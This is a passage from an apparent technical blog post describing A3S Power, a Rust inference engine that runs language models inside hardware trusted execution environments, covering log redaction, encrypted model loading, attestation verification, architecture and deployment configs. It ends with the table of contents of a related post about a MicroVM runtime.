│     │         account numbers → removed,                    │      │
│     │         individual amounts → fuzzy ranges             │      │
│     └──────────────────────────────────────────────────────┘      │
│                                                                   │
└─────────────────────────────────────────────────────────────────┘
                              │
                              ▼ Redacted data leaves TEE
┌─────────────────────────────────────────────────────────────────┐
│  What the analyst sees:                                           │
│                                                                   │
│  "Stable Growth A fund saw concentrated redemptions Feb 18-20,   │
│   totaling approximately $2M, involving a small number of        │
│   clients. Possible reason: fund NAV declined 3.2%, triggering   │
│   some clients' stop-loss thresholds.                            │
│   Recommend monitoring this fund's liquidity risk."              │
└─────────────────────────────────────────────────────────────────┘

Note the key point in this flow: the original client names, account numbers, and exact amounts never leave the TEE encrypted memory. The analyst gets the business insight they need (which fund is seeing redemptions, possible reasons, risk recommendations), but sees no information that could identify specific clients.

A 0.5B model can't do this — it can't understand that "[Name]" is a person's name that needs redaction while "Stable Growth A" is a fund name that can be retained. It also can't determine that "$520,000" should be fuzzed to a range rather than completely deleted. This context-aware intelligent redaction requires 10B-level semantic understanding.

Responsibility three: Gatekeeper for Sensitive Tool Calls (Tool Guard). AI Agents interact with the external world through tools — executing shell commands, reading/writing files, calling APIs, accessing databases. Some tool calls involve sensitive operations: deleting production data, sending emails, modifying permissions, accessing key management systems. Approval for these operations cannot be delegated to systems outside the TEE (because external systems may be compromised) — it must be done inside the TEE by a model smart enough to judge: "Is this tool call within the authorized scope of the current task? Are the parameters reasonable? Is there a risk of privilege escalation?" A 10B model has the capability to understand complex tool call semantics and make accurate allow/deny decisions in milliseconds.

These three responsibilities share a common characteristic: they are all decision points on the security-critical path, where wrong judgments directly lead to data leakage or system compromise. Using a 0.5B model for these tasks is like having an intern review nuclear plant safety protocols — capability mismatch. 10B is currently the best balance achievable within TEE memory constraints: powerful enough to handle security decisions, yet small enough to run smoothly in 256MB EPC.

picolm makes this balance possible. Without layer-streaming inference, you can only run a 0.5B model in 256MB — those security responsibilities would degrade to simple rule matching, easily bypassed by attackers.

Auto-Routing: You Don't Need to Manually Choose a Backend

A3S Power doesn't only have picolm as an inference backend. Its architecture defines a key abstraction — the Backend trait — where any inference engine that implements this trait can be plugged in. Three backends are built in, covering the complete hardware spectrum from $10 edge devices to high-end GPU TEE servers:

Hardware Condition              Auto-selected Backend           Characteristics
──────────────────────────     ─────────────────────────     ──────────────────────────
256MB memory, no GPU            picolm (pure Rust streaming)   O(layer_size) memory, 10B model
(edge device / TEE EPC)

Sufficient memory, no GPU       mistralrs (pure Rust candle)   Full load, faster inference
(standard server / large EPC)   ★ Default backend

GPU TEE environment             llama.cpp (C++ bindings)       GPU acceleration, max throughput
(AMD SEV-SNP GPU TEE)           or mistralrs + CUDA

This means A3S Power isn't a specialized tool that only works under extreme conditions — it's an inference platform that automatically upgrades with hardware conditions. Today you use picolm on a 256MB edge device to run a 10B model for security decisions; tomorrow your TEE server gets a GPU, and the same code, same config automatically switches to the GPU-accelerated backend, boosting inference speed by tens of times.

BackendRegistry implements TEE-aware auto-routing. find_for_tee() reads available memory from /proc/meminfo as an EPC approximation:

Model size ≤ 75% EPC → use mistralrs (full load, faster)
Model size > 75% EPC → use picolm (layer-streaming, less memory)
GPU available and backend supports it → prefer GPU-accelerated backend

The 75% threshold leaves room for working buffers, KV cache, and OS overhead. Completely transparent to users — just send requests, the system automatically selects the best backend. In a typical 256MB EPC scenario, a 10B model automatically routes to picolm, while a 0.5B model can be fully loaded with mistralrs.

And the Backend trait is open — you can implement your own inference backend (such as integrating TensorRT-LLM or other GPU inference frameworks), register it with BackendRegistry, and immediately gain all of A3S Power's security capabilities: TEE attestation, model binding, log redaction, encrypted model loading. The security layer and inference layer are completely decoupled.

That prompt is now being inferred. But during inference, there are some information leakage channels you might not have thought of.

6. Logs, Error Messages, Token Counts — Every One Can Betray You

TEE hardware encryption protects data in memory from being read externally. But privacy protection isn't just memory encryption. Logs, metrics, error messages, and even token counts produced by the inference server itself can all become channels for information leakage.

Let's address each one.

Leakage Channel One: Logs

When redact_logs = true, PrivacyProvider automatically strips inference content from all log output. Redaction covers 10 sensitive JSON keys:

Key	Coverage Scenario
`content`	Chat message content
`prompt`	Completion request prompt
`text`	Text output
`arguments`	Tool call arguments
`input`	Embedding request input
`delta`	Streaming delta
`system`	System prompt
`message`	Generic message field
`query`	Query field
`instruction`	Instruction field

See the effect:

Before redaction:

{"content": "Client [Name], holds 500,000 shares of AAPL...", "model": "llama3"}

After redaction:

{"content": "[REDACTED]", "model": "llama3"}

Key design decision: redaction executes before log writing, not as post-processing. Sensitive data never appears in log files — even if an attacker gets the log files, they can't recover the inference content.

Leakage Channel Two: Error Messages

Error messages during LLM inference may contain prompt fragments. For example, a tokenization error might echo part of the prompt content in the error message. The sanitize_error() function detects and strips these leaks:

Before sanitization: "Tokenization failed for prompt: Client [Name] holds 500,000 shares of AAPL..."
After sanitization:  "Tokenization failed for prompt: [REDACTED]"

It recognizes prefixes like prompt:, content:, message:, input:, and truncates everything after them.

Leakage Channel Three: Token Count Side Channel

This one is easy to overlook. Precise token counts can be used to infer the length and content characteristics of a prompt — this is a side-channel attack.

When suppress_token_metrics = true, A3S Power rounds token counts in responses to the nearest 10:

Actual token count: 137 → Returns: 140
Actual token count: 42  → Returns: 40

Simple, but effective. Eliminates information leakage from precise token counts while retaining sufficient precision for billing and monitoring.

Leakage Channel Four: Memory Residue

The inference request is complete, but the prompt and response data may still linger in memory — until overwritten by other data. During this window, memory dump attacks can recover this data.

A3S Power implements systematic memory zeroing via the zeroize crate:

SensitiveString wrapper: All inference content (prompts, responses) is wrapped in SensitiveString, which automatically zeroes memory on Drop
zeroize_string() and zeroize_bytes(): Helper functions for manual zeroing
Zeroizing<Vec<u8>>: Decryption buffers for encrypted models use this wrapper; plaintext weights are zeroed immediately after use
mlock() memory locking: On Linux, decrypted model weights are locked in physical memory via mlock(), preventing them from being swapped to disk. munlock() is called on release

Even if an attacker captures a memory snapshot after inference completes, they cannot recover the prompt, response, or model weights.

Four leakage channels, four lines of defense. That prompt's privacy is now comprehensively protected.

But there's one thing we haven't discussed — the model weights themselves.

7. Model Weights Are Also Confidential: Three Encrypted Loading Modes

The Problem: Models Are Intellectual Property

A carefully fine-tuned model may represent millions of dollars of investment and unique competitive advantage. If the model is stored in plaintext on disk, infrastructure operators can easily copy it.

How A3S Power Solves It: AES-256-GCM Encrypted Models

A3S Power supports AES-256-GCM encrypted model files (.enc suffix). The encryption format is [12-byte nonce][AES-256-GCM ciphertext+tag]. Three decryption modes address different security and performance needs.

Mode one: DecryptedModel (file mode)

Decrypts ciphertext to a temporary .dec file. Works with all backends. Performs secure erasure on Drop — first overwrites file contents with zeros, then deletes the file.

Encrypted file → AES-256-GCM decryption → Temporary .dec file → Backend loads
                                                                    │
                                                              On Drop:
                                                              1. Zero-overwrite file
                                                              2. Delete file

Mode two: MemoryDecryptedModel (memory mode)

Decrypts the entire model into mlock-locked RAM; plaintext never touches disk. On Drop, memory is automatically zeroed via Zeroizing<Vec<u8>>, then munlock releases the lock.

Encrypted file → AES-256-GCM decryption → mlock-locked RAM → Backend loads
                                                                    │
                                                              On Drop:
                                                              1. Memory zeroing (zeroize)
                                                              2. munlock release

This is the recommended choice in TEE mode (in_memory_decrypt = true), because model plaintext never appears on disk — not even as a temporary file.

Mode three: LayerStreamingDecryptedModel (streaming mode)

Designed specifically for the picolm backend. Decrypts the entire model once, then provides chunked access on demand. Each chunk is returned as Zeroizing<Vec<u8>>, automatically zeroed after use.

Encrypted file → AES-256-GCM decryption → Chunked access interface
                                                    │
                                              picolm requests layer N:
                                              → Returns Zeroizing<Vec<u8>>
                                              → Forward pass
                                              → Chunk Drop → Memory zeroed

This mode pairs perfectly with picolm's layer-streaming inference: at any moment, only one layer's plaintext weights exist in memory.

Key Management

The KeyProvider trait provides an extensible key management interface:

pub trait KeyProvider: Send + Sync {
    async fn get_key(&self) -> Result<[u8; 32]>;
    async fn rotate_key(&self) -> Result<[u8; 32]>;
    fn provider_name(&self) -> &str;
}

Two built-in implementations:

StaticKeyProvider: Loads key from file or environment variable, cached via OnceCell. Suitable for single-key scenarios
RotatingKeyProvider: Supports multiple keys, implements zero-downtime rotation via atomic index. rotate_key() advances to the next key (cycling), get_key() returns the current key

Key sources support two forms:

# Load from file (64 hex characters = 32 bytes)
model_key_source = { file = "/path/to/key.hex" }

# Load from environment variable
model_key_source = { env = "MY_MODEL_KEY" }

For production environments requiring HSM/KMS integration, a custom KeyProvider can be implemented.

At this point, that prompt's journey is nearly complete. Inference is done, and the response is returned to the trader through an encrypted channel. But before trusting this response, the client has one last thing to do.

8. How Can the Client Verify All of This Itself?

The Problem: "Please Trust Us" Isn't Enough

The server says it's running in a TEE, says it's doing log redaction, says it loaded the correct model. But these are all self-declarations from the server. Why should the client believe them?

How A3S Power Solves It: Independent Client Verification

A3S Power's security model isn't "please trust us" — it's "please verify yourself." The client independently verifies every security claim the server makes through the a3s-power-verify CLI or Verify SDK.

The complete chain of trust looks like this:

AMD/Intel Silicon (physical hardware — root of trust)
    │
    ├── Secure Processor (PSP / SGX)
    │   └── Manages AES encryption keys for each VM
    │
    ├── Hardware Root Key (ARK / Intel Root CA)
    │   └── Intermediate certificate (ASK / PCK CA)
    │       └── Chip-level certificate (VCEK / PCK)
    │           └── Attestation report signature
    │
    └── Platform Measurement
        └── Hash of code at boot time
            └── Proves runtime environment hasn't been tampered with
                │
                ├── report_data[0..32] = nonce (prevents replay)
                └── report_data[32..64] = model_sha256 (model identity)

The verify_report() function performs four-step verification, each an independent security check:

Step one: Nonce binding verification. Checks whether report_data[0..32] equals the nonce the client sent. Prevents replay attacks — an attacker cannot use an old attestation report to impersonate the current TEE environment. Verification uses constant-time comparison to prevent timing side channels.

Step two: Model hash binding verification. Checks whether report_data[32..64] equals the expected model SHA-256 hash. Proves the server is running the model you expect — not a smaller substitute, not a backdoored version.

Step three: Platform measurement verification. Checks whether measurement (48-byte SHA-384) equals a known-good value. Proves the TEE environment's boot code (firmware, kernel, application) hasn't been tampered with.

Step four: Hardware signature verification. Verifies the attestation report's signature via the HardwareVerifier trait:

AMD SEV-SNP: Fetches VCEK certificate from AMD KDS, verifies ECDSA P-384 signature. Certificate chain: ARK → ASK → VCEK → report signature
Intel TDX: Fetches PCK certificate from Intel PCS, verifies ECDSA P-256 signature. Certificate chain: Intel Root CA → PCK CA → PCK → report signature

Certificate cache has a 1-hour TTL to avoid frequent requests being rate-limited by AMD KDS.

pub struct VerifyOptions<'a> {
    pub nonce: Option<Vec<u8>>,
    pub expected_model_hash: Option<Vec<u8>>,
    pub expected_measurement: Option<Vec<u8>>,
    pub hardware_verifier: Option<&'a dyn HardwareVerifier>,
}

The combination of four-step verification means: the client can independently confirm the inference server's identity, runtime environment, and model identity without trusting any intermediary.

That prompt's journey ends here. From the hardware attestation in the TLS handshake, to TEE memory encryption, to model identity verification, to layer-streaming inference, to log redaction and memory zeroing, to independent client verification — every step has cryptographic guarantees, depending on no one's promises.

Now let's step back and look at the architecture supporting all of this.

9. Six-Layer Architecture: What's Inside

A3S Power is written in Rust. The entire system consists of six layers, each with clear responsibilities, communicating with adjacent layers through trait interfaces.

Layer Topology

┌─────────────────────────────────────────────────────────────────────┐
│  API Layer                                                          │
│  /v1/chat/completions · /v1/completions · /v1/embeddings            │
│  /v1/models · /v1/attestation · /health · /metrics                  │
├─────────────────────────────────────────────────────────────────────┤
│  Server Layer                                                       │
│  RateLimiter → RequestID → Metrics → Tracing → CORS → Auth         │
│  AppState · Audit (JSONL/Encrypted/Async/Noop) · Transport          │
├─────────────────────────────────────────────────────────────────────┤
│  Backend Layer                                                      │
│  BackendRegistry (priority routing, TEE-aware)                      │
│  ┌─────────────────┬─────────────────┬────────────────┐             │
│  │ MistralRs ★     │ LlamaCpp        │ Picolm         │             │
│  │ Pure Rust(candle│ C++ bindings    │ Pure Rust      │             │
│  │ GGUF/SafeTensors│ GGUF            │ O(layer_size)  │             │
│  └─────────────────┴─────────────────┴────────────────┘             │
├─────────────────────────────────────────────────────────────────────┤
│  Model Layer                                                        │
│  ModelRegistry · BlobStorage (SHA-256) · GgufMeta · HfPull          │
├─────────────────────────────────────────────────────────────────────┤
│  TEE Layer (cross-cutting security layer)                           │
│  Attestation · EncryptedModel · Privacy · ModelSeal · KeyProvider   │
│  TeePolicy · EPC Detection · RA-TLS Certificate                    │
├─────────────────────────────────────────────────────────────────────┤
│  Verify Layer (client SDK)                                          │
│  verify_report() · HardwareVerifier (AMD KDS / Intel PCS)           │
└─────────────────────────────────────────────────────────────────────┘

What Each Layer Does

API Layer — Provides OpenAI-compatible HTTP endpoints: /v1/chat/completions, /v1/completions, /v1/embeddings, /v1/models. Plus A3S Power's unique /v1/attestation endpoint. The autoload module implements automatic model loading, LRU eviction, decryption, and integrity verification.

Server Layer — Manages the middleware stack (rate limiting, request ID, metrics, tracing, CORS, authentication), application state (AppState), audit logging, and transport protocols (TCP/TLS/Vsock). AppState is the core state container, holding references to all key components: model registry, backend registry, TEE provider, privacy provider, etc.

Backend Layer — The abstraction layer for inference engines, and the key to A3S Power's architectural flexibility. BackendRegistry automatically selects the optimal backend based on priority, model format, and hardware conditions. Three built-in backends cover the complete hardware spectrum: picolm (pure Rust layer-streaming, 256MB edge devices), mistralrs (pure Rust candle, standard servers, default), llama.cpp (C++ bindings, GPU acceleration). The Backend trait is open — you can plug in any inference framework and immediately gain all of A3S Power's security capabilities.

Model Layer — Manages model storage, registration, and pulling. BlobStorage uses SHA-256 content-addressed storage with automatic deduplication. ModelRegistry manages model manifests via RwLock<HashMap> with JSON persistence. HfPull supports pulling models from HuggingFace Hub with resume support and SSE progress streaming.

TEE Layer — The core differentiating layer, cross-cutting all other layers. Contains attestation, encrypted model loading (EncryptedModel), privacy protection (Privacy), model integrity (ModelSeal), key management (KeyProvider), policy engine (TeePolicy), EPC memory detection, and RA-TLS certificate management.

Verify Layer — Client SDK for independently verifying server attestation reports. Includes nonce binding verification, model hash binding verification, platform measurement verification, and hardware signature verification (AMD KDS / Intel PCS certificate chain).

Minimal Core + External Extensions

The trustworthiness of a security system is inversely proportional to its complexity. More code means more vulnerabilities and harder auditing. A3S Power minimizes the amount of code that must be trusted:

Core (7)                              Extensions (8 traits)
─────────────────────────             ──────────────────────────────────────
AppState (model lifecycle)            Backend: MistralRs / LlamaCpp / Picolm
BackendRegistry + Backend trait       TeeProvider: SEV-SNP / TDX / Simulated
ModelRegistry + ModelManifest         PrivacyProvider: redaction policy
PowerConfig (HCL)                     TeePolicy: allowlist + measurement binding
PowerError (14 variants → HTTP)       KeyProvider: Static / Rotating / KMS
Router + middleware stack             AuthProvider: API Key (SHA-256)
RequestContext (per-request context)  AuditLogger: JSONL / Encrypted / Async / Noop
                                      HardwareVerifier: AMD KDS / Intel PCS

Core components are stable and non-replaceable; extension components are trait-based and independently replaceable. All extensions have default implementations — works out of the box, customization is optional.

Here are a few key trait definitions:

// TEE hardware abstraction
pub trait TeeProvider: Send + Sync {
    async fn attestation_report(&self, nonce: Option<&[u8]>) -> Result<AttestationReport>;
    fn is_tee_environment(&self) -> bool;
    fn tee_type(&self) -> TeeType;
}

// Privacy protection policy
pub trait PrivacyProvider: Send + Sync {
    fn should_redact(&self) -> bool;
    fn sanitize_log(&self, msg: &str) -> String;
    fn sanitize_error(&self, err: &str) -> String;
    fn should_suppress_token_metrics(&self) -> bool;
}

// Inference backend
pub trait Backend: Send + Sync {
    fn name(&self) -> &str;
    fn supports(&self, format: &ModelFormat) -> bool;
    async fn load(&self, manifest: &ModelManifest) -> Result<()>;
    async fn chat(&self, model_name: &str, request: ChatRequest)
        -> Result<Pin<Box<dyn Stream<Item = Result<ChatResponseChunk>> + Send>>>;
    // ...
}

// Audit log persistence
pub trait AuditLogger: Send + Sync {
    fn log(&self, event: AuditEvent);
    async fn flush(&self);
}

TEE Policy Engine

The TeePolicy trait demonstrates the flexibility of extension points:

pub trait TeePolicy: Send + Sync {
    fn is_allowed(&self, tee_type: TeeType) -> bool;
    fn validate_measurement(&self, measurement: &[u8]) -> bool;
}

Three preset policies:

permissive(): Allows all TEE types, no measurement check. For development environments
strict(): Only allows hardware TEE (sev-snp, tdx), rejects simulation mode. For production environments
Custom: Fine-grained control via allowlists and measurement mappings

When the A3S_POWER_TEE_STRICT=1 environment variable is set, the system automatically removes "simulated" from the allowlist — a safety guardrail preventing accidental use of simulation mode in production.

10. Why Pure Rust? The Trust Ledger of Supply Chain Auditing

The Problem: Can You Audit It All?

In a TEE environment, every line of code on the inference path is part of the Trusted Computing Base (TCB). The larger the TCB, the larger the attack surface, and the harder the audit.

C/C++ code is the biggest risk source in security auditing — buffer overflows, use-after-free, uninitialized memory, and other memory safety vulnerabilities account for the majority of CVE database entries.

How A3S Power Solves It: Pure Rust Inference Path

A3S Power provides the tee-minimal build configuration — currently the smallest auditable LLM inference stack in existence:

Build Config	Inference Backend	Dependency Tree Lines	C Dependencies
`default`	mistralrs (candle)	~2,000	None
`tee-minimal`	picolm (pure Rust)	~1,220	None
`llamacpp`	llama.cpp	~1,800+	Yes (C++)

The tee-minimal configuration includes:

picolm backend: ~4,500 lines of pure Rust code, complete transformer forward pass. Zero C dependencies — every line of code can be audited by the Rust toolchain
Complete TEE stack: attestation, model integrity (SHA-256), log redaction, memory zeroing
Encrypted model loading: AES-256-GCM, supports in-memory and streaming decryption
RA-TLS transport: attestation embedded in X.509 certificate
Vsock transport: for communication inside a3s-box MicroVM

# Build minimal TEE configuration
cargo build --release --no-default-features --features tee-minimal

For TEE deployments, pure Rust means:

Auditable scope: 1,220 dependency tree lines vs 2,000+, 40% reduction in audit workload
No C/C++ toolchain: No need to trust the correctness of gcc/clang compilers
Memory safety guarantees: Rust compiler verifies memory safety at compile time, no runtime checks needed
Minimized unsafe blocks: unsafe in picolm is only used for mmap and madvise system calls, each individually auditable

picolm Is Not a Toy

picolm is a complete, production-ready transformer inference engine:

Attention mechanism: Multi-head attention + Grouped Query Attention (GQA), supports Q/K/V bias (Qwen, Phi)
Feed-forward network: SwiGLU (LLaMA, Mistral, Phi) and GeGLU (Gemma) activation variants
Positional encoding: RoPE with pre-computed cos/sin tables, supports partial dimensions
Normalization: RMSNorm, per-layer on-demand dequantization
Dequantization: Q4_K, Q5_K, Q6_K, Q8_0, Q4_0, F16, F32
Fused kernels: Dequantization + dot product in single pass, no intermediate buffers
Parallel computation: Rayon multi-threaded row-parallel matrix multiply
FP16 KV cache: Half-precision storage, memory halved
BPE tokenizer: Complete GPT-style byte pair encoding, supports ChatML templates

11. Compared to Ollama, vLLM, TGI — Where's the Gap?

Let's look at the table directly:

Capability	Ollama	vLLM	TGI	A3S Power
OpenAI-compatible API	Yes	Yes	Yes	Yes
GPU acceleration	Yes	Yes	Yes	Yes
Streaming	Yes	Yes	Yes	Yes
TEE hardware isolation (SEV-SNP / TDX)	--	--	--	Yes
Remote attestation (hardware-signed proof)	--	--	--	Yes
Model attestation binding	--	--	--	Yes
RA-TLS (attestation in TLS handshake)	--	--	--	Yes
Encrypted model loading (AES-256-GCM, 3 modes)	--	--	--	Yes
Deep log redaction (10 keys + error sanitization)	--	--	--	Yes
Memory zeroing (zeroize on drop)	--	--	--	Yes
Client verification SDK	--	--	--	Yes
Hardware signature verification (AMD KDS / Intel PCS)	--	--	--	Yes
Layer-streaming inference (10B model in 256MB)	--	--	--	Yes
Multi-backend auto-routing (edge→GPU TEE seamless upgrade)	--	--	--	Yes
Pure Rust inference path (fully auditable)	--	--	--	Yes

When Should You Use A3S Power?

Use A3S Power:

Processing regulated data (SOX, GLBA, HIPAA, GDPR) requiring technical guarantees rather than policy promises
Multi-tenant AI platforms needing hardware-level tenant isolation
Need to prove to clients or auditors that inference data wasn't leaked
Model weights are core intellectual property that needs protection from operator copying
Need to run a 10B model on $10, 256MB hardware for security decisions
Edge deployment scenarios: IoT gateways, embedded devices, memory-constrained container environments
Supply chain security requires the inference path to be fully auditable (no C/C++ dependencies)

Use traditional inference servers:

Internal deployment with full trust in infrastructure
Extremely latency-sensitive, TEE overhead not acceptable
Need to maximize GPU utilization (vLLM's PagedAttention)
Data being processed is not sensitive

12. If You Need to Deploy Today

If you need to get A3S Power running today, here's what you need to know.

Fastest Start: Development Mode

# power.hcl — minimal config
bind = "0.0.0.0"
port = 11434

# Start
a3s-power --config power.hcl

# Pull a model
curl -X POST http://localhost:11434/v1/models/pull \
  -H "Content-Type: application/json" \
  -d '{"model": "qwen2.5:0.5b"}'

# Inference (same experience as Ollama)
curl http://localhost:11434/v1/chat/completions \
  -H "Content-Type: application/json" \
  -d '{"model": "qwen2.5:0.5b", "messages": [{"role": "user", "content": "hello"}]}'

Production Mode: Full TEE

# power.hcl — production TEE config
bind = "0.0.0.0"
port = 11434
tls_port = 11443

# TEE security
tee_mode = true
ra_tls   = true
model_hashes = {
  "llama3.2:3b" = "sha256:a1b2c3d4e5f6..."
}
model_signing_key = "a1b2c3d4..."

# Encrypted models
in_memory_decrypt = true
model_key_source  = { env = "A3S_MODEL_KEY" }

# Privacy protection
redact_logs             = true
suppress_token_metrics  = true

# Build minimal TEE binary
cargo build --release --no-default-features --features tee-minimal

# Start inside SEV-SNP VM
A3S_MODEL_KEY="your-64-hex-char-key" a3s-power --config power.hcl

Client Verification

# Verify the server's TEE attestation
a3s-power-verify \
  --url https://your-server:11443 \
  --model llama3.2:3b \
  --expected-hash sha256:a1b2c3d4e5f6...

Or use the SDK:

use a3s_power_verify::{verify_report, VerifyOptions};

let report = fetch_attestation(url, nonce).await?;
verify_report(&report, &VerifyOptions {
    nonce: Some(nonce),
    expected_model_hash: Some(expected_hash),
    expected_measurement: Some(known_measurement),
    hardware_verifier: Some(&amd_kds_verifier),
})?;
// Verification passed, safe to send inference requests

Position in the A3S Ecosystem

A3S Power is the inference engine of the A3S privacy-preserving AI platform, running inside the a3s-box MicroVM:

┌──────────────────────────────────────────────────────────────────┐
│                         A3S Ecosystem                             │
│                                                                   │
│  ┌──────────────────────────────────────────────────────────┐    │
│  │  a3s-box MicroVM (AMD SEV-SNP / Intel TDX)               │    │
│  │  ┌────────────────────────────────────────────────────┐  │    │
│  │  │  a3s-power                                         │  │    │
│  │  │  OpenAI API ← Vsock/RA-TLS → Host                 │  │    │
│  │  └────────────────────────────────────────────────────┘  │    │
│  │  Hardware-encrypted memory — host cannot read             │    │
│  └──────────────────────────────────────────────────────────┘    │
│       ▲ Vsock                                                     │
│       │                                                           │
│  ┌────┴─────────┐  ┌──────────────┐  ┌────────────────────────┐  │
│  │  a3s-gateway │  │  a3s-event   │  │  a3s-code              │  │
│  │  (API routing│  │  (event bus) │  │  (AI coding agent)     │  │
│  └──────────────┘  └──────────────┘  └────────────────────────┘  │
│                                                                   │
│  Client:                                                          │
│  ┌──────────────────────────────────────────────────────────┐    │
│  │  a3s-power verify SDK                                     │    │
│  │  Nonce binding · Model hash binding · Hardware sig verify │    │
│  └──────────────────────────────────────────────────────────┘    │
└──────────────────────────────────────────────────────────────────┘

Component	Relationship with Power
a3s-box	Hosts Power inside TEE MicroVM
a3s-code	Uses Power as local inference backend
a3s-gateway	Routes inference requests to Power instances
a3s-event	Distributes inference events
verify SDK	Client attestation verification

Technical Roadmap

Three things in progress:

Expanding TEE hardware support — Intel TDX support is already reserved in the architecture (TeeType::Tdx variant defined, ioctl calls implemented). ARM CCA (Confidential Compute Architecture) is on the future radar
GPU TEE acceleration — AMD SEV-SNP has begun supporting GPU TEE (Confidential GPU), meaning A3S Power's multi-backend architecture can seamlessly upgrade: same security layer + GPU-accelerated backend, inference throughput increases by tens of times while maintaining hardware-level privacy protection. picolm solves the "can it run" problem; GPU TEE backends solve the "how fast can it run" problem
Deeper ecosystem integration — Tighter integration with a3s-box MicroVM to automate TEE deployment workflows. Integration with the a3s-code AI coding agent framework to let AI Agents reason under TEE protection

Back to the opening scenario. The client portfolio and trading strategy information that trader typed, from the moment it left the keyboard, went through RA-TLS attestation handshake, TEE hardware memory encryption, model identity verification, layer-streaming inference, log redaction, and memory zeroing — every step with cryptographic guarantees, depending on no one's goodwill.

And inside the TEE, that 10B model isn't just answering the trader's question. It's simultaneously doing three things: checking whether this prompt contains injection attacks, intelligently redacting client information and position data from the returned results, and approving subsequent sensitive tool calls that might be triggered. These security decisions must be made inside hardware-encrypted memory, and must be made by a model smart enough to do so — picolm's layer-streaming inference lets a 256MB EPC run a 10B model, making all of this possible.

This isn't "we promise not to look at your data." This is "even if we wanted to look, the hardware won't allow it."

858 tests ensure the correct implementation of these technical choices. The pure Rust minimal TCB (~1,220 dependency tree lines) ensures the inference path is fully auditable. And for users, the experience is as simple as using Ollama — send a request, get a result.

The difference is: this time, you don't need to trust anyone. And you don't need an expensive server — a $10 piece of hardware with 256MB of memory is enough.

A3S Power — A Privacy LLM Inference Engine on $10 Hardware.

Forem: Roy Lin

A 40MB MicroVM Runtime Written in Rust — A Perfect Docker Replacement for AI Agent Sandboxes

Table of Contents

1. Introduction: Why We Need to Rethink Container Runtimes

2. First Principles: Starting from the Fundamental Question

2.1 What Is the Essence of Workload Isolation?

2.2 Hardware Isolation Is the Only Fundamental Solution

2.3 A3S Box's Core Insight

2.4 Why libkrun?

3. Architecture Overview: Seven Crates in Precise Collaboration

3.1 Crate Topology

3.2 Crate Responsibilities

3.3 Core Trait System

4. Core Value 1: True Hardware-Level Isolation

4.1 From Namespaces to Hypervisor

4.2 Layered Isolation

4.3 Guest Init's Secure Boot Chain

5. Core Value 2: Confidential Computing and Zero-Trust Security

5.1 What Is Confidential Computing?

5.2 A3S Box's TEE Implementation

5.3 RA-TLS: Embedding Attestation into TLS

5.4 Sealed Storage

6. Core Value 3: MicroVM with 200ms Cold Start

6.1 Why Does Startup Speed Matter?

6.2 Startup Flow Optimization

6.3 Warm Pool: Eliminating Cold Starts

7. Core Value 4: Full Docker-Compatible Experience

7.1 52 Docker-Compatible Commands

7.2 Why Is Compatibility So Important?

8. Core Value 5: Secure Isolation Sandbox for AI Agents

8.1 Security Challenges in the AI Agent Era

8.2 Why Traditional Containers Are Not Enough?

8.3 SDK-Driven Sandbox Integration

8.4 Warm Pool Accelerates Agent Response

8.5 Seven-Layer Defense Against Agent Threats

8.6 Auditing and Compliance

8.7 Lightweight Deployment: ~40MB Complete Runtime

9. Deep Dive: VM Lifecycle State Machine

9.1 BoxState State Machine

9.2 VmController Startup Flow in Detail

9.3 macOS Entitlement Signing

9.4 Graceful Shutdown and Forced Termination

10. TEE Confidential Computing: The Trust Chain from Hardware to Application

10.1 Building the Trust Chain

10.2 Attestation Policy Engine

10.3 Re-attestation Mechanism

10.4 Key Injection Flow

11. Vsock Communication Protocol: The Bridge Between Host and Guest

11.1 Why Vsock?

11.2 Port Allocation

11.3 Binary Frame Protocol

11.4 Exec Protocol in Detail

11.5 PTY Protocol in Detail

12. OCI Image Processing Pipeline: From Registry to Root Filesystem

12.1 The Complete Image Pull Chain

12.2 Image Reference Parsing

12.3 Multi-Architecture Image Resolution

12.4 Caching and Deduplication

12.5 Rootfs Construction

12.6 Image Signature Verification

12.7 Image Pushing

13. Network Architecture: Three Flexible Modes

13.1 Network Mode Overview

13.2 TSI Mode (Default)

13.3 Bridge Mode

13.4 Network Configuration and IPAM

13.5 Network Policy

13.6 DNS Discovery

13.7 None Mode

14. Guest Init: PID 1 Inside the MicroVM

14.1 Why a Custom PID 1?

14.2 Startup Sequence in Detail

14.3 Process Isolation Strategy

14.4 Security Policy Application

14.5 Graceful Shutdown

15. Warm Pool: The Ultimate Solution to Cold Starts

15.1 The Nature of the Cold Start Problem

15.2 Warm Pool Architecture

15.3 Core Configuration

15.4 Acquire and Release